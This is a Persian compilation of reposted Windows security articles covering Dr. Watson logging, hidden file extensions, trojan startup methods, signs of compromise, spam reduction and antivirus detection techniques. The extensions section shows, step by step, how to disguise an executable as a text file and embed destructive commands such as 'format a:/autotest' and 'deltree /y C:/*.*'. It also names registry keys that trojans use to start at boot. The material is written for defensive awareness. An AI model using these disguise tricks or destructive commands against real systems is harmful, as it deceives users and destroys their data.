براي ارتباط با اين متخصصين فقط كافي است كه به قسمت پشتيباني تكنيكي سايت Microsoft مراجعه كنيد و بعد فايل Log را براي آنها ارسال كنيد و منتظر راهنمايي هاي آنها بمانيد. مطمئن باشيد شما را بدون جواب نخواهند گذاشت.
و اما نحوه كار با اين برنامه مفيد :
اين برنامه به صورت پيش فرض از ديد كاربران پنهام است و شما نميتوانيد آن را در پوشه Tools بيابيد. براي اجراي آن ابتدا از طريق منوي Start وارد برنامه Run شده و عبارت DrWtsn32 را تايپ كرده و سپس Enter را بزنيد تا برنامه اجرا شود.
پس از شروع برنامه شما ميتوانيد تنظيمات مورد نياز را انجام داده و بعد به ساير كارهاي خود بپردازيد.
اما توضيح تنظيمات برنامه :
در قسمت Log File Path شما ميتوانيد مسير ذخيره فايل Log برنامه را تعيين كنيد.
در قسمت Crash Dump شما ميتوانيد مسير فايل ذخيره موقت ( تصوير لحظه اي ) برنامه را تعيين كنيد ( بهتر است اين قسمت را تغيير ندهيد ).
در قسمت Wave File شما ميتوانيد يك فايل صدا را تعيين كنيد كه برنامه هر وقت مشكلي را ثبت كرد به شما با آن صدا هشدار دهد.
در قسمت Number Of Instructions شما ميتوانيد تعداد راهنماييهايي را كه برنامه در فايل Log به شما آموزش ميدهد را تعيين كنيد.
در قسمت Number Of Errors To Save شما ميتوانيد تعداد ثبت خطاها را در هر فايل Log مشخص كنيد.
در قسمت Crash Dump Type شما ميتوانيد نوع ذخيره فايل Dump ( يا تصوير لحظه اي ) را در هنگام Crash سيستم تعيين كنيد. Full يعني ذخيره به صورت كامل با تمام جزئيات ، Mini يعني تا حد امكان خلاصه و مختصر ، NT4 Compatible Full يعني فايلي كامل سازگار با سيستمهاي NT4 .
در قسمت Options ميتوانيد جزئيات تكنيكي فايل Log خود را افزايش يا كاهش دهيد. به ترتيب زير :
Dump Symbol Table : نمايش و ذخيره فايل Dump با تمام كاراكترهاي حرفي و شكلي.
Dump All Thread Contexts : نمايش و ذخيره فايل Dump با تمام متون و داده هاي رشته اي.
Appened To Existing Log File : اضافه كردن تمام موارد فايل Dump به فايل Log موجود.
Visual Notification : ضبط و ثبت اخطارهاي ديداري.
Sound Notification : ضبط و ثبت اخطارهاي صوتي.
Create Crash Dump File : ساخت يك فايل Dump در مواقع Crash براي بازبيني هاي بعدي.
در قسمت Application Errors خطاهايي كه به تازگي در كار با سيستم براي كاربر اتفاق افتاده نمايش داده ميشوند. با Highlight كردن هر كدام از آنها و فشردن دكمه View ميتوانيد فايل Dump يا همان حالت موقتي را كه در بالا بحث كردم را مشاهده كنيد. يادتان باشد متون نوشته شده در فايل موقت كه شما مشاهده ميكنيد هر بار با Restart شدن سيستم به صورت اتوماتيك در فايل Log ذخيره ميشوند. با فشردن دكمه Clear آن اخطار از ليست Application Errors حذف ميشود.
براي مشاهده فايل Log برنامه Dr.Watson شما ميتوانيد از ويرايشگر WordPad استفاده كنيد. اين فايل را بايد در همان مسيري كه مشخص كرديد بيابيد ( با نام DrWtsn32.log ). البته مسير پيش فرض خود برنامه به صورت زير است :
Document and setting / All users / Application Data / Microsoft / Dr Watson
اگر نرم افزار خاصي را نصب كرده ايد كه به نظر شما مسبب از كار افتادن سيستمتان است ، قبل از نصب برنامه يك تصوير لحظه اي از سيستم بگيريد و سپس به برنامه Dr.Watson اجازه دهيد كه يك تصوير لحظه اي ديگر را پس از انجام عمل نصب برنامه بگيرد. با اين كار شما ميتوانيد به بخش پشتيباني Microsoft كمك كنيد كه با مقايسه اين تصاوير شما را در حل هر چه سريعتر مشكلتان ياري كنند.
در صورتي كه از سيستمي با سرعت بالا استفاده ميكنيد توصيه ميكنم تمام موارد Options را انتخاب كنيد و Crash Dump Type را نيز در حالت Full قرار دهيد تا فايل Log شما با جزئيات كامل ساخته شود.
بعد از تنظيم كردن برنامه كافيه كه شما روي دكمه OK كليك كنيد تا برنامه در پشت پرده به كار خودش ادامه دهد. معمولا بعد از فشردن دكمه OK برنامه از ديد شما پنهان ميشود اما در بسياري از مواقع به صورت يك آيكن در نوار وظيفه نمايش داده ميشود كه شما ميتوانيد با دوبار كليك روي آن تنظيمات را تغيير دهيد يا فايلهاي موقت موجود را بازبيني كنيد.
بعد از اجراي برنامه ميتوانيد با خيالي آسوده به ساير كارهاي خود مشغول شويد و از اينكه يك نفر همواره مراقب و محافظ سيستم شماست لذت ببريد.
(به نقل از P30World)
دانستن انواع روش های هک و نفوذ به کامپیوتر و ترفندهای جلوگیری از آن میتواند تا حد بسیار زیادی شما را در برابر هکرها ایمن کند. نا گفته هایی از پسوندهای فایلها و روش های پاکسازی آنها ، روشهای تروجانها در هنگام راه اندازی و روشهای راه اندازی برنامه های هک ، راه هایی از این قبیل هستند که شما بایستی طریقه مقابله با آنها را بلد باشید.
پسوندهاي پنهان فايلهاي ويندوز
ممكن است از اين موضوع آگاهي نداشته باشيد، اما حتي اگر به ويندوز بگوييد كه تمام پسوندهاي فايل را نشان دهد، هنوز هم فايلهايي وجود دارند كه بطور پيش فرض مخفي شدهاند. همچنين هر برنامه نصب شدهايي ميتواند پسوندها را پيكربندي كند تا پنهان شوند. در اينجا در مورد چگونگي انجام اين كار و همچنين دليل اينكه چرا برخي از پسوندهاي پنهان ميتوانند براي تعدادي از كاربرهاي كامپيوتر خطرناك باشند، مثالهايي آورده شده است. به فرض اينكه شما قبلا ويندوز explorer را براي نشان دادن تمام پسوندهاي پيكربندي كردهايد.
پسوندهاي SHS
يك كپي از notepad.exe بگيريد و آن را روي desktop خود قرار دهيد. Wordpad را باز كنيد. روي notepad.exe كليك كنيد و آن را به سمت سند باز شده wordpad بكشيد. روي notepad.exe كليك كنيد و آن را به عقب به سمت desktop بكشيد. فايلي را كه ايجاد شده است (Scrap) به Readme.txt تغيير نام دهيد.
حالايك آيكن كه نشان دهنده سند متني است و فايلي با نام مشخص readme.txt بر روي desktop شما وجود دارد كليك كردن بر روي فايل فوق باعث ميشود notepad باز شود. اگر اين فايل يك Trojan باشد، شما فريب خوردهايد و توسط آنچه كه يك فايل متني بيخطر بنظر ميرسيد آلوده شدهايد. اگر اجازه نمايش اين پسوند داده مي شد شما فريب فايل Readme.txt.shs را نميخورديد.
پسوندهاي PIF
اگر سعي كنيد تا notepad.exe را به anything.txt.pif تغيير نام دهيد، تنها فايلي با نام anything.txt روي desktop خود خواهيد ديد. و اين بدين دليل است كه PIF پسوند ديگري است كه ويندوز بطور پيش فرض پنهان ميكند. اگر شما فايل را اجرا كنيد برنامه اجرا خواهد شد، به خاطر اينكه ويندوز پسوندهاي PIF را اجرا خواهد كرد حتي اگر آنها فايلهاي اجرايي باشند.
پسوندهاي SCR
پسوند ديگري كه بايد مراقب آن بود SCR است. كپي notepad.exe خود را به notepad.scr تغيير نام دهيد و روي آن كليك كنيد. Notepad به عنوان يك فايل اجرايي اجرا خواهد شد. بسياري از افراد توسط هكرهايي فريب ميخورند كه account يك قرباني را بدست آوردهاند. هكر email يا هر نوع پيغامي را به تمام دوستان قرباني ميفرستد كه "اين صفحه نمايش جديد و بامزه را ببينيد از خنده روده بر خواهيد شد!" از آنجايي كه اين پيغام از يك منبع مطمئن آمده، اكثر افراد فريب خورده و فايل SCR را اجرا ميكنند كه در نهايت به هكري ختم ميشود كه به كامپيوتر شما متصل شده است.
پسوندهاي ميانبر PIF
برخي از پسوندهاي پنهان فايل قادرند به سادگي با فرمانهاي پنهان شدهاي كه ميتوانند براي سيستم شما مخرب باشند برنامهريزي شوند. اين يك آزمايش ساده است:
دكمه راست ماوس خود را روي desktop كليك كنيد و New و سپس Shotcut را انتخاب نماييد. در Command line دستورformat a:/autotest تايپ كنيد. حالا Next را كليك كنيد. در "Select a name for the shortcut" تايپ كنيد: readme.txt . سپس Next را كليك كنيد. يك آيكن notepad را انتخاب كرده و Finish را كليك كنيد. حالا شما در desktop خود فايلي با نام readme.txt و با آيكن notepad داريد. مطمئن شويد كه در درايو شما ديسكي است كه از دست دادن آن براي شما اشكالي ندارد و روي آيكن كليك كنيد. فايلي كه شما روي آن كليك كردهايد درايو A: را فرمت خواهد كرد. البته آيكن هكر درايو ديگري را مورد هدف قرار خواهد داد يا ممكن است نامي همچون ‘game.exe’ و فرماني براي حذف كردن دايركتوري ويندوز شما يا (deltree /y C:/*.*) كل درايو C شما داشته باشد. اگر پسوند PIF پنهان نشود، قادر به فريب شما نخواهد بود.
پسوند SHS
فايلهاي Scrap نيز ميتوانند فرمانهاي گنجانده شده را پنهان كند. اين يك آزمون ساده است: از notepad.exe يك كپي بگيريد و آن را روي desktop خود قرار دهيد. Wordpad را باز كنيد.Notepad.exe را كليك كنيد و آن را به سمت سند باز شده wordpad بكشيد. روي Edit كليك كنيد و Package Object و سپس Edit package را انتخاب كنيد. روي Edit و سپس Command Line كليك كنيد.
در كادر، دستوري مانند format a:/autotest را تايپ كنيد و روي OK كليك كنيد. آيكن نيز ميتواند از اين پنجره تغيير يابد. از پنجره خارج شويد، اين كار سند را به روز خواهد كرد. روي notepad.exe كليك كنيد و آن را به عقيب به سمت Desktop بكشيد. فايلي را كه ايجاد شده (Scrap) به Readme.txt تغيير نام دهيد.
حالا شما آنچه را كه شبيه يك فايل متني است داريد. اگر اين فايل اجرا شود درايو A: را فرمت خواهد كرد. همانگونه كه در مثال بالا براي پسوندهاي ميانبر PIF ديده شد، هكر ميتواند از فرمانهاي خطرناكتري استفاده كند.
روشهاي Trojan در هنگام راه اندازي
روشهاي راه اندازي استاندارد
اكثر افراد از راههاي متفاوتي كه هكرها براي راه اندازي فايلهاي Trojan استفاده ميكنند آگاه نيستند. اگر هكري كامپيوتر شما را با يك Trojan آلوده كند، نياز به انتخاب يك روش راهاندازي خواهد داشت، بگونهاي كه در زمان راهاندازي مجدد كامپيوتر شما Trojan بارگذاري شود. روشهاي معمول راهاندازي شامل كليدهاي اجرايي registry، فولدر راه اندازي ويندوز، Windows Load= يا run=lines يافته شده در فايل win.ini و shell=line يافته شده در system.ini ويندوز ميباشند.
روشهاي راه اندازي خطرناك
از آنجايي كه فقط تعداد اندكي از اين روشهاي راه اندازي وجود دارند، هكرهاي زيادي را يافتهايم كه در پيدا كردن روشهاي جديد راهاندازي افراط ميكنند. اين شامل استفاده از تغييرات خطرناكي در سيستم registry ميباشد، كه در صورتي كه فايل Trojan يا فايل همراه آن از بين برود سيستم را بصورت بلااستفاده درخواهد آورد. اين يك دليل استفاده نكردن از نرم افزار ضد ويروس براي از بين بردن Trojanهاست. اگر يكي از اين روشها استفاده شود، و فايل بدون ثابت كردن registry سيستم از بين برود، سيستم شما قادر به اجراي هيچگونه برنامهاي پس از راه اندازي مجدد كامپيوترتان نخواهد بود.
قبل از آنكه سراغ registry برويم لازم به توضيح است كه يك فولدر به صورت C:/WINDOWS/StartMenu/Program/StartUp وجود دارد كه هر فايلي در اينجا باشد هنگام راه اندازي ويندوز اجرا خواهد شد.توجه داشته باشيد كه هرگونه تغييري ميتواند سيستم شما را به خطر بياندازد بنابراين، هرچه ما ميگوييم انجام دهيد. براي دستيابي به registry به منوي start>run> برويد و "regedit" را بدون علامت " " تايپ كنيد. در registry چندين مكان براي راه اندازي Startup وجود دارد كه ليستي از آنها را در اينجا مي آوريم.
HKEY_CLASSES_ROOT/comfile/shell/open/command] ="/"%1/" %*"
HKEY_CLASSES_ROOT/batfile/shell/open/command] ="/"%1/" %*"
HKEY_CLASSES_ROOT/htafile/Shell/Open/Command]="/"%1/" %*"
HKEY_CLASSES_ROOT/piffile/shell/open/command] ="/"%1/" %*"
HKEY_LOCAL_MACHINE/Software/CLASSES/batfile/shell/open/command] ="/"%1" %*"
HKEY_LOCAL_MACHINE/Software/CLASSES/comfile/shell/open/command]="/"%1/" %*"
HKEY_LOCAL_MACHINE/Software/CLASSES/exefile/shell/open/command]="/"%1/"%*"
HKEY_LOCAL_MACHINE/Software/CLASSES/htafile/Shell/Open/Command]="/"%1/"%*"
HKEY_LOCAL_MACHINE/Software/CLASSES/piffile/shell/open/command]="/"%1
اگر اين كليدها مقدار "/"%1/"%*" را نداشته باشند و به جاي اجراي فايل در هنگام راه اندازي به "/"Server.exe %1/" %*" تغيير يابد به احتمال زياد يك Trojan است.
روش راه اندازي ICQ
روشي راه اندازي ديگري كه امروزه استفاده از آن معمول است شناسايي شبكه ICQ ميباشد. بسياري از كاربران ICQ نميدانند كه هكر ميتواند يك خط پيكربندي را به ICQ اضافه نمايد تا با هر بار بارگذاري شدن برنامه Trojan نيز راه اندازي شود. به عنوان آزمايش مراحل زير را انجام دهيد:
ICQ را باز كنيد. روي آيكن ICQ كليك كنيد و preference را انتخاب نماييد. روي Edit launch List كليك كنيد. روي Add كليك كنيد. روي Browse كليك كنيد. فايلي را براي اضافه كردن به Windows/notepad.exe بيابيد كه به كار اين آزمايش بيايد. روي Open و سپس OK كليك كنيد. زماني كه شما ICQ را راه اندازي مجدد ميكنيد فايل اجرا خواهد شد.
(به نقل از میکسیران)
چگونه بفهمیم که هک شده ایم؟ این سوالی است که روزانه بسیاری از افراد از خودشان میپرسند. یا پس از به وجود آمدن مشکلی در سیستم خود فکر هک شدن سیستم به ذهنشان خطور میکند. اما فهمیدن این که آیا نفوذگر توانسته به سیستم ما دسترسی پیدا کند برای خود نشانه هایی دارد. تا دیر نشده این ترفند را مطالعه کرده و در صورت داشتن این نشانه ها سیستم خود را ایمن کنید.
* هنگام كار با اينترنت مانيتور شما ناگهان خاموش مى شود يا تصوير آن وارونه مى شود ياسيستم شما به طور ناگهانى خاموش مى شود و يا Restart مى كند.
* شخصى با ID شما در مسنجر Yahoo با دوستانتان صحبت كرده و خودش را به جاى شما جا زده.
* CD-Rom شما خود به خود باز و بسته مى شود.
و ده ها مورد عجيب ديگر كه تابحال نديده بوديد و چند وقتى است كه با آنها دست به گريبان شديد...
در اين موارد احتمال هك شدن وجود دارد . در واقع نفوذگر با نصب نرم افزار هك بر روى دستگاه شما قادر خواهد بود اين كارها را انجام دهد . البته در بعضى موارد نيز احتمال دارد سيستم شما دچار خرابى سخت افزارى يا نرم افزارى شده باشد.
ولى هرگز اين مورد را از نظر نبايد دور داشت كه در بعضى موارد نفوذگر علاقه اى به خودنمايى ندارد . او بدون سر و صدا اطلاعات كسب مى كند و شايد دنبال پسوردها ، شماره تلفنها ، كارتهاى اعتبارى و يا موارد ديگر باشد.
يك مورد خطرناك تر هم وجود دارد و آن مورد اين است كه نفوذگر از دستگاه شما به عنوان طعمه استفاده كند و از طريق آن به ساير كامپيوترها حمله كند و به اين طريق رد خود را از بين ببرد.
اگر حملات وى اثر بخش باشد ممكن است شما به عنوان يك هكر دچار دردسرهاى قانونى شويد ! حتى بسته به مكانهايى كه هكر اصلى به آنها حمله كرده ممكن است شما واقعا" به دردسر بدى بيفتيد.
پس بهتر است هرچه زودتر خود را در اين زمينه تجهيز كنيد تا هرگز طعمه قرار نگيريد.
(به نقل از شبکه فناوری اطلاعات ایران)
اسپم به زبان ساده ایمیلهای ناخواسته ای است که معمولا به صورت انبوه برای شما ارسال میشوند.اسپمها يکی از متداولترين و در عين حال منفی ترين جنبه های دارا بودن يک آدرس Email است . با اين که در حال حاضر و با توجه به تکنولوژی های موجود امکان حذف کامل اين نوع از نامه های الکترونيکی ناخواسته وجود ندارد ، ولی قصد داریم ترفندهایی را به شما معرفی کنیم که با استفاده از آنها می توانید تعداد آنها را کاهش دهید .
Spam يکی از متداولترين و در عين حال منفی ترين جنبه های دارا بودن يک آدرس Email است . با اين که در حال حاضر و با توجه به تکنولوژی های موجود امکان حذف کامل اين نوع از نامه های الکترونيکی ناخواسته وجود ندارد ، ولی می توان با استفاده از برخی روش های موجود تعداد آنان را کاهش داد .
Spam ، نسخه الکترونيکی از " نامه های بدرد نخور " است . واژه Spam به پيام های الکترونيکی ناخواسته ، اطلاق می گردد . اين نوع از نامه های الکترونيکی ارتباط مستقيمی با ويروس نداشته و حتی ممکن است پيام هائی که از منابع معتبر ارسال شده اند نيز در زمره اين گروه قرار گيرند .
چگونه می توان ميزان Spam را کاهش داد ؟
با رعايت برخی نکات ، می توان ميزان Spam دريافتی را بطرز محسوسی کاهش داد :
آدرس Email خود را بدون دليل در اختيار ديگران قرار ندهيد . آدرس های پست الکترونيکی به اندازه ای متداول شده اند که شما می توانيد بر روی هر فرمی که به منظور کسب اطلاعات شما در نظر گرفته می شود ، وجود فيلد خاصی به منظور دريافت آدرس Email را مشاهد نمائيد . تعدادی زيادی از مردم بدون درنظر گرفتن مسائل جانبی ، آدرس Email خود را در هر محلی و يا هر فرمی درج می نمايند . مثلا" شرکت ها ، اغلب آدرس ها را در يک بانک اطلاعاتی ثبت تا بتوانند وضعيت مشتيريان خود را در آينده دنبال نمايند . برخی اوقات ، اطلاعات فوق به ساير شرکت ها فروخته شده و يا امکان استفاده مشترک برای آنان ، فراهم می گردد . بديهی است در چنين مواردی ممکن است برای شما يک Email و از طرف شرکتی ارسال شود که نه توقع آن را داشته ايد و نه از آنان درخواستی مبنی بر ارائه اطلاعات خاصی را داشته ايد.
بررسی سياست های محرمانگی . قبل از ارسال آدرس Email خود به صورت online ، بدنبال Privacy سايت مورد نظر بگرديد .تعداد بسيار زيادی از سايت های شناخته شده و خوشنام دارای يک لينک خاص بر روی سايت خود به منظور آشنائی کاربران با سياست های آن سايت در خصوص نحوه برخورد با اطلاعات ارسالی شما می باشند . (همواره اين پرسش را برای خود مطرح نمائيد که آيا ما آدرسEmail خود را در سايت هائی درج می نمائيم که نسبت به آنان شناخت کافی داريم ؟) . شما می بايست قبل از ارسال آدرس Email خود و يا ساير اطلاعات شخصی ، سياست های اعلام شده توسط سايت مورد نظر را مطالعه نموده و از اين موضوع آگاه شويد که مالکين و يا مسئولين سايت قصد انجام چه کاری را با اطلاعات ارسالی شما دارند .
دقت لازم در خصوص گزينه هائی که به صورت پيش فرض فعال شده اند . زمانی که شما برای دريافت خدمات و يا Account جديد عمليات sign in را انجام می دهيد ، ممکن است بخشی وجود داشته باشد که به شما مجموعه ای از گزينه ها را در خصوص دريافت email در خصوص محصولات و يا سرويس های جديد ، ارائه نمايد . در برخی مواقع ، گزينه ها به صورت پيش فرض انتخاب شده اند ، بنابراين در صورتی که شما آنان را به همان وضعيت باقی بگذاريد ، در آينده نه چندان دور برای شما حجم زيادی از نامه های الکترونيکی که شايد انتظار آنان را نداشته باشد ، ارسال گردد .
استفاده از فيلترها : تعدادی زيادی از برنامه های پست الکترونيکی امکان فيلترينگ را ارائه می نمايند . پتانسيل فوق به شما اين اجازه را خواهد داد که آدرس های خاصی را بلاک نموده و يا امکان دريافت نامه را صرفا" از طريق ليست تماس موجود بر روی کامپيوتر خود ، داشته باشيد. برخی مراکز ارائه دهنده خدمات اينترنت ( ISP ) نيز سرويس فيلترينگ و علامت گذاری مربوط به مقابله با Spam را ارائه می نمايند . در چنين مواردی ممکن است پيام های معتبری که بدرستی طبقه بندی نشده باشند به عنوان spam درنظر گرفته شده و هرگز به صندوق پستی شما ارسال نگردند .
هرگز برروی لينک های موجود در يک Spam ، کليک ننمائيد . برخی از منابع ارسال کننده Spam با ارسال آدرس های Email متغير در يک Domain خاص ، سعی در تشخيص معتبر بودن يک آدرس Email می نمايند. ( مثلا" تشخيص آدرس های Email معتبر موجود بر روی hotmail و يا yahoo ) .در صورتی که شما بر روی يک لينک ارسالی توسط يک Spam کليک نمائيد ، صرفا" معتبر بودن آدرس Email خود را به اطلاع آنان رسانده ايد . پيام های ناخواسته ای که يک گزينه "عدم عضويت " وسوسه انگيز را در اختيار شما قرارمی دهند ، اغلب به عنوان روشی به منظور جمع آوری آدرس های Email معتبر مورد استفاده قرار گرفته که در آينده از آنان به منظور ارسال Spam استفاده گردد .
غيرفعال نمودن گزينه دريافت اتوماتيک گرافيک در نامه های الکترونيکی با فرمت HTML . تعداد زيادی از شرکت ها ، نامه های الکترونيکی را با فرمت HTML و همراه با يک فايل گرافيکی لينک شده ارسال نموده که در ادامه از آن به منظور رديابی فردی که پيام الکترونيکی را باز نموده است ، استفاده می نمايند . زمانی که برنامه سرويس گيرنده پست الکترونيکی شما ، اقدام به download گرافيک از سرويس دهنده آنان می نمايد ، آنان می دانند که شما پيام الکترونيکی را باز نموده ايد . با غير فعال نمودن HTML mail و مشاهده پيام ها با فرمت صرفا" متن ، می توان پيشگيری لازم در خصوص اين مسئله را انجام داد .
ايجاد و يا بازنمودن Account های جديد اضافی : تعداد زيادی از سايت ها ، اقدام به عرضه آدرس پست الکترونيکی به صورت رايگان می نمايند . در صورتی که شما بطور مداوم اقدام به ارسال آدرسEmail خود می نمائيد ( برای خريد online ، دريافت سرويس و ... ) ، ممکن است مجبور به ايجاد يک account ديگر به منظور حفاظت آدرس account اوليه خود در مقابل spam شويد . شما همچنين می بايست از يک account ديگر در زمانی که اطلاعاتی را بر روی بولتن های خبری online ، اطاق های چت ، ليست های عمومی Mailing و يا USENET ارسال می نمائيد، استفاده نمائيد . بدين تريتب می توان يک سطح حفاظتی مناسب در خصوص دريافت spam به آدرس Email اوليه خود را ايجاد کرد.
برای سايرين Spam ارسال ننمائيد . يک کاربر متعهد و دلسوز باشيد . در خصوص پيام هائی که قصد فوروارد نمودن آنان را داريد ، سختگيرانه عمل کنيد . هرگز هرگونه پيامی را برای هر شخص موجود در ليست دفترجه آدرس خود فوروارد نکرده و اگر فردی از شما بخواهد که پيامی را برای وی فوروارد ننمائيد ، به درخواست وی احترام بگذاريد .
(به نقل از P30WORLD)
بحث آنتی ویروسها را به طور کامل برای شما بازکنیم. اینکه چه آنتی ویروسی مطمئن تر است؟ آنتی ویروسها چگونه یک ویروس را میشناسند؟ تکنیک های ویروس یابی و بسیاری مطالب دیگر. با بهره گیری از این ترفند میتوانید خودتان آنتی ویروس بهتر و مطمئن تر را انتخاب کنید.
اشاره :
در دنياي شبكهاي امروز، لزوم داشتن يك نرمافزار ضدويروس قدرتمند كه كامپيوتر ما را از انواع ويروسها، كرمها، بمبهاي منطقي و بهطور كلي كدهاي مخرب مصون بدارد، بيش از هر زمان ديگري احساس ميشود. خوشبختانه (شايد هم متأسفانه) انتخابهاي متعددي در اين زمينه وجود دارد. ولي واقعاً كدام يك از آنها ميتواند بهتر مشكل كامپيوتر (يا كامپيوترهاي شبكه) ما را حل كند؟ كافي است سري به سايتهاي مربوط به فروشندگان اين نوع نرمافزارها بزنيد. به نظر ميرسد كه همه آنها از بهترينها هستند. و همه آنها در تمام طول سال و در تمام 24 ساعت شبانهروز خدمات خود را ارايه ميدهند. از طرفي به دليل بازار رقابتي موجود، هيچكدام از آنها اطلاعات دقيقي از نرمافزارخود ارايه نميدهند. شما چه يك متخصصIT باشيد و چه يك كاربر معمولي، ممكن است به دليل نداشتن اطلاعات صحيح براي انتخاب ضدويروس مناسب خود با مشكل مواجه ميشويد. بنابراين بسيار مهم است كه بدانيد ضدويروسها چگونه كار ميكنند و در واقع عوامل مهم براي انتخاب آنها كدامند.
ضدويروسها چگونه كار ميكنند؟
اولين قدم جهت انتخاب يك ضدويروس مناسب آشنايي با كاركرد ضدويروسها ميباشد.
پس از آشنايي با خصوصيات يك ضدويروس، واژگاني كه در اين زمينه استفاده ميشود، را خواهيد شناخت. اينكه بدانيد ضدويروس چه كارهايي ميتواند انجام بدهد و چه كارهايي نميتواند انجام دهد، به شما كمك ميكند كه انتظارات معقولي از آن داشته باشيد.
يك ضدويروس چگونه ويروسها را شناسايي ميكند؟
روشهاي مختلفي براي شناسايي ويروسها وجود دارد.
ويروسها (بهطور معمول) چيزي بيشتر از كد يك برنامه نيستند. بنابراين اگر ما بدانيم كه هر كدي چه كاري انجام ميدهد قادر خواهيم بود كه كد حامل ويروس را به محض رويت شناسايي كنيم.
اين كار اولين عملي است كه انجام ميگيرد و به نام Signature Matching معروف است.
نرمافزارهاي ضدويروس كه به اين روش كار ميكنند داراي يك بانك اطلاعاتي هستند كه شامل Virus signatureها است و به محض اينكه كدي را ملاحظه كرد كه معادل يكي از ركوردها باشد آن را به عنوان ويروس شناسايي ميكند. به نظر ميرسد كه موثرترين راه براي كشف ويروسها همين باشد. روش فوق ذاتاً بهگونهاي است كه اول ويروس را شناسايي ميكند و بعد متناظر با آن يك ركورد (virus signature) به بانك اطلاعاتي اضافه ميكند و حالا اگر ويروسي پيدا كند، در صورتيكه متناظر با اين ويروس ركوردي در بانك اطلاعاتي باشد قادر به شناسايي آن خواهد بود و همين امر ايجاب ميكند شركتهايي كه از اين فناوري در نرمافزار خود استفاده ميكنند مدام آن را بروز نگه دارند. به هر حال اين يك نقطه ضعف ميباشد و براي فائق آمدن بر آن دو روش ديگر در نرمافزارهاي ضدويروس معرفي شده است.
1- Heuristic method (روش مكاشفهاي)
فلسفه Heuristic اين است كه بتوانيم ويروسهايي را شناسايي كنيم كه هنوز Virus Signature آنها در بانك اطلاعاتي موجود نميباشد.
اين كار با استفاده از يك بانك اطلاعاتي كه ركوردهاي آن حاوي Virus behavior signature ميباشد قابل انجام است. ركوردهاي اين بانك اطلاعاتي امضاي ويروس خاصي را نگهداري نميكنند بلكه بيشتر رفتارهاي (رفتار بد) ويروسها را ذخيره ميكنند. مثلاً اينكه هر كجا تشخيص بدهند كدي قصد پاك كردن Boot Sector را دارد از آن جلوگيري ميكنند.
الگوريتمهايHeuristic به دو صورت پيادهسازي ميشوند:
● اگر تكنولوژي Heuristic كد هر برنامه را با Virus behavior Signature مقايسه كند و مورد آناليز قرار دهد آن را روش static heuristic ميناميم.
● در بعضي مواقع اين تكنولوژي قطعه كد را در يك ماشين مجازي اجرا ميكند تا نتايج رفتاري آن را ببيند به اين روش dynamic heuristic ميگوييم. اين روش ممكن است نتايج غلطي نيز توليد كند.
Integrity checksum -2 (جامعيت سرجمع)
در روش integrity checksum، فرض براين است كه ويروس قصد اعمال تغييراتي در فايل دارد. مثلاً يك ويروس ميخواهد كه روي يك فايل چيزي بنويسد يا اينكه خودش را به آخر فايلي اضافه كند. در اين روش نرمافزار checksum فايل غيرويروسي و يا درايورهاي تميز را ذخيره ميكند و هرگاه كه تغييري در اين checksum مشاهده شود متوجه ميشود كه احتمال دارد ويروسي اين كار را انجام داده باشد. در اين روش نيز احتمال توليد نتايج غلط وجود دارد. اين روش در مقابله با ويروسهاي ماكرويي يا ويروسهاي مانند code Red كه بدون اينكه در هيچ فايلي ذخيره شوند در حافظه بارگذاري و اجرا ميشوند، كارايي چنداني ندارد.
اگر يك كد مزاحم از تمام الگوريتمهاي يك ضدويروس كه تاكنون نام برديم بگذرد، در گام آخر توسط فناوري ديگري به نام Activity Blocker از فعاليت آن جلوگيري ميشود. اين تكنولوژي از تمام فعاليتهايي كه ممكن است توسط يك كد مخرب صورت بپذيرد جلوگيري ميكند مثلاً اگر تشخيص دهد كه هاردديسك در حال فرمت شدن است از آن جلوگيري ميكند.
يك ضدويروس چه موقع ويروسها را شناسايي ميكند؟
معمولاً ضدويروسها به دو روش ميتوانند ويروسها را شناسايي كنند.
در روش اول ضدويروس، به صورت Real Time (بلادرنگ) و همان موقع كه فايل مورد دسترسي قرار ميگيرد عمل ميكند. در اين روش، ضدويروس درون حافظه مقيم ميشود و تمام فعاليتهاي مربوط به سيستم را مورد ارزيابي و بررسي قرار ميدهد. اين نرمافزارها با همكاري سيستمعامل متوجه ميشوند كه هماكنون قرار است فايلي مورد دسترسي قرار بگيرد. سريعاً اين فايل را بررسي و نتيجه را گزارش ميدهند. به اين روش on-access ميگويند.
مزيت اين روش در ارايه يك حفاظت دايمي است ولي اشكالي كه دارد اين است كه تنها فايلها را به هنگام دسترسي مورد بررسي قرار ميدهد. يعني احتمالاً اگر ويروسي در يك فايل قرار گرفته باشد و در ديسك ذخيره شده باشد، با اين روش قابل شناسايي نيست. در روش دوم اين امكان به كاربر داده ميشود كه خودش نرمافزار ضدويروس را براي بررسي كردن ديسك يا يك فايل به كمك بگيرد. براي اينكه فعاليت فوق بازده بهتري داشته باشد بايد ضدويروس را طوري تنظيم كرد كه در دورههاي زماني معين اقدام به اسكن كند. اين روش به on-demand معروف است.
ضدويروسها چه كارهايي را ميتوانند انجام دهند و چه كارهايي را نميتوانند انجام دهند؟
1- محافظت صددرصدي
هيچ ضدويروسي وجود ندارد كه بتواند به صورت صددرصد سيستم شما را در مقابل ويروسها ايمن كند. ويروسها و كدهاي مخرب هميشه از ضدويروسها جلو بودهاند CodeRed .،Melissa ،Funlove ، Nimda و ويروسهاي زياد ديگر اين فرضيه را ثابت نمودهاند و البته دليل پويايي و حيات نرمافزارهاي ضدويروس نيز همين قضيه ميباشد.
به خاطر داريد كه ضدويروسها براي شناسايي يك ويروس بهطور معمول نياز به virus signature دارند و البته هنگامي كه اين signature موجود نباشد از روشهاي heuristic استفاده ميشود كه اين روش نيز هميشه جواب درست را برنميگرداند. با اين همه، ضدويروسها در مقابل ويروسهاي شناخته شده (بيش از60 هزار عدد) يك حفاظت همه جانبه از سيستم شما به عمل ميآورند.
بيشتر ضدويروسها در صورت بروز و ظهور يك ويروس جديد قادر خواهند بود كه به سرعت آن را شناسايي كنند و سيستم شما را از وجود اين ويروس پاك نگه دارند.
2- بازسازي فايلهاي ويروسي شده
آيا هر ويروسي كه توسط نرمافزار ضدويروس شناسايي شد قابل از بين بردن است؟
بستگي دارد كه عملكرد ويروس چگونه باشد.
بعضي از ويروسها مانند ويروسهاي ماكرويي به راحتي توسط نرمافزار ضدويروسي تشخيص داده ميشوند و از فايل بيرون كشيده ميشوند و پاك ميشوند. اين فايلها هيچ آسيبي به فايل ميزبان خود نميرسانند.
